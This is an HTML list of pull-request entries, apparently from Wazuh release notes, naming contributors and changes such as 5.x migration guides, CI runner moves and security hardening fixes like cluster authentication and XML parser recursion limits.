<li>Add bump-issue-link support to bumper workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664679055" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36868" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36868/hovercard" href="https://github.com/wazuh/wazuh/pull/36868">#36868</a></li>
<li>Add guide for migrating manager coordinator from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639020634" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36829" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36829/hovercard" href="https://github.com/wazuh/wazuh/pull/36829">#36829</a></li>
<li>Add Wazuh Manager Configuration documentation from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4611934920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36779" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36779/hovercard" href="https://github.com/wazuh/wazuh/pull/36779">#36779</a></li>
<li>Add documentation to migrate filebeat to indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664131019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36866/hovercard" href="https://github.com/wazuh/wazuh/pull/36866">#36866</a></li>
<li>wazuh-manager: Benchmark and footprint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4456748469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36145" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36145/hovercard" href="https://github.com/wazuh/wazuh/pull/36145">#36145</a></li>
<li>Update manager upgrade block message by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4681713013" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36987" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36987/hovercard" href="https://github.com/wazuh/wazuh/pull/36987">#36987</a></li>
<li>5.x PR workflows improvements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596503652" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36766" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36766/hovercard" href="https://github.com/wazuh/wazuh/pull/36766">#36766</a></li>
<li>Add Manager 5.0 release notes and breaking changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4648591326" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36850" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36850/hovercard" href="https://github.com/wazuh/wazuh/pull/36850">#36850</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [main] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692375185" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37012" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37012/hovercard" href="https://github.com/wazuh/wazuh/pull/37012">#37012</a></li>
<li>chore: update vulnerable Python framework dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699088509" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37024" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37024/hovercard" href="https://github.com/wazuh/wazuh/pull/37024">#37024</a></li>
<li>Add Manager 5.0 wazuh-manager.conf configuration reference by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691339394" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36999" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36999/hovercard" href="https://github.com/wazuh/wazuh/pull/36999">#36999</a></li>
<li>Add virustotal migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692765810" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37013" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37013/hovercard" href="https://github.com/wazuh/wazuh/pull/37013">#37013</a></li>
<li>Add VD migration documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692092118" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37008" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37008/hovercard" href="https://github.com/wazuh/wazuh/pull/37008">#37008</a></li>
<li>Add documentation for wpk upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4693271310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37015" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37015/hovercard" href="https://github.com/wazuh/wazuh/pull/37015">#37015</a></li>
<li>Migrate agent build workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701880741" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37028" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37028/hovercard" href="https://github.com/wazuh/wazuh/pull/37028">#37028</a></li>
<li>XML Decoders migration to YAML by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673566639" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36959" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36959/hovercard" href="https://github.com/wazuh/wazuh/pull/36959">#36959</a></li>
<li>CDB to KVDB migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4690514873" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36996" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36996/hovercard" href="https://github.com/wazuh/wazuh/pull/36996">#36996</a></li>
<li>Documentation of Agentless migration to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4699204980" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37025" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37025/hovercard" href="https://github.com/wazuh/wazuh/pull/37025">#37025</a></li>
<li>Fix manager reload/restart silently fails by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673792785" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36962" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36962/hovercard" href="https://github.com/wazuh/wazuh/pull/36962">#36962</a></li>
<li>Randomize key generation for installation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651010813" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36861" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36861/hovercard" href="https://github.com/wazuh/wazuh/pull/36861">#36861</a></li>
<li>Retry vulnerability feed validation failures promptly by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665777430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36874" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36874/hovercard" href="https://github.com/wazuh/wazuh/pull/36874">#36874</a></li>
<li>Bump 5.0.0 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716517657" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37040" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37040/hovercard" href="https://github.com/wazuh/wazuh/pull/37040">#37040</a></li>
<li>Fix agent permanently stuck when TCP connection is silently half-closed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616576722" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36790" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36790/hovercard" href="https://github.com/wazuh/wazuh/pull/36790">#36790</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.6] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692373330" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37010" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37010/hovercard" href="https://github.com/wazuh/wazuh/pull/37010">#37010</a></li>
<li>ci(gha): migrate server/manager workflows to AWS CodeBuild runners [4.14.7] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692374310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37011/hovercard" href="https://github.com/wazuh/wazuh/pull/37011">#37011</a></li>
<li>fix: correct blob URL refs for release branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4718016446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37046" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37046/hovercard" href="https://github.com/wazuh/wazuh/pull/37046">#37046</a></li>
<li>Use restricted wazuh-server user for Manager Indexer authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724661439" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37061" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37061/hovercard" href="https://github.com/wazuh/wazuh/pull/37061">#37061</a></li>
<li>fix(packages): use wazuh-manager-control in manager init.d scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724166255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37059" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37059/hovercard" href="https://github.com/wazuh/wazuh/pull/37059">#37059</a></li>
<li>fix: Update the unclassified event doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4726479817" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37126" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37126/hovercard" href="https://github.com/wazuh/wazuh/pull/37126">#37126</a></li>
<li>Skip vanished /proc entries during ports scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4650163579" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36859" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36859/hovercard" href="https://github.com/wazuh/wazuh/pull/36859">#36859</a></li>
<li>Fix RBAC permission check to verify allow effect in update_config rules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724800552" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37076" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37076/hovercard" href="https://github.com/wazuh/wazuh/pull/37076">#37076</a></li>
<li>Add destination confinement to worker non-merged and extra file sync paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691222179" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36998" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36998/hovercard" href="https://github.com/wazuh/wazuh/pull/36998">#36998</a></li>
<li>Patch cluster authentication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716191480" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37039" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37039/hovercard" href="https://github.com/wazuh/wazuh/pull/37039">#37039</a></li>
<li>Lower stale-session indexer log to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733981786" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37150" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37150/hovercard" href="https://github.com/wazuh/wazuh/pull/37150">#37150</a></li>
<li>Limit recursion depth in XML parser by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4733223430" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37147" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37147/hovercard" href="https://github.com/wazuh/wazuh/pull/37147">#37147</a></li>
<li>Add status endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696177149" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37022" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37022/hovercard" href="https://github.com/wazuh/wazuh/pull/37022">#37022</a></li>
<li>Add log collectors reference docs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721989446" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37057" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37057/hovercard" href="https://github.com/wazuh/wazuh/pull/37057">#37057</a></li>
<li>Run the Windows MSI package test on the AWS CodeBuild runner by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4738105790" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37165" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37165/hovercard" href="https://github.com/wazuh/wazuh/pull/37165">#37165</a></li>
<li>Remove merged.mg hash cache to fix stale syscollector flush by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720281364" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37048" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37048/hovercard" href="https://github.com/wazuh/wazuh/pull/37048">#37048</a></li>
<li>Enrich MITRE fields with id and names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721520471" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37054" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37054/hovercard" href="https://github.com/wazuh/wazuh/pull/37054">#37054</a></li>
<li>Reduce indexer connection warning noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4696113780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37021" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37021/hovercard" href="https://github.com/wazuh/wazuh/pull/37021">#37021</a></li>
<li>Remove deprecated wazuh-dbd daemon by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715728814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37035" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37035/hovercard" href="https://github.com/wazuh/wazuh/pull/37035">#37035</a></li>
<li>Bound decompressed size when processing sync archives by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725313255" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37119" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37119/hovercard" href="https://github.com/wazuh/wazuh/pull/37119">#37119</a></li>
<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742531433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37176/hovercard" href="https://github.com/wazuh/wazuh/pull/37176">#37176</a></li>
<li>Add libcrypt fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a>) to 4.14.6 changelog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743056771" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37178" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37178/hovercard" href="https://github.com/wazuh/wazuh/pull/37178">#37178</a></li>
<li>Delay IndexerDownloader connection warnings until 3 failed attempts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742582733" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37177" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37177/hovercard" href="https://github.com/wazuh/wazuh/pull/37177">#37177</a></li>
<li>Add parameterized target selection to Coverity scan workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4740074465" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37171" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37171/hovercard" href="https://github.com/wazuh/wazuh/pull/37171">#37171</a></li>
<li>Align remoted tier 2 CodeBuild setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735418555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37155" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37155/hovercard" href="https://github.com/wazuh/wazuh/pull/37155">#37155</a></li>
<li>Add rules migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jorgesnchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jorgesnchz">@Jorgesnchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495888102" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36305" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36305/hovercard" href="https://github.com/wazuh/wazuh/pull/36305">#36305</a></li>
<li>Migrate agent Linux/Windows test workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720554249" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37051" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37051/hovercard" href="https://github.com/wazuh/wazuh/pull/37051">#37051</a></li>
<li>Silence spurious keepalive warnings on the Windows agent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745531717" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37187" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37187/hovercard" href="https://github.com/wazuh/wazuh/pull/37187">#37187</a></li>
<li>wazuh-engine: Improve log messages and logger by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4688784533" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36995" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36995/hovercard" href="https://github.com/wazuh/wazuh/pull/36995">#36995</a></li>
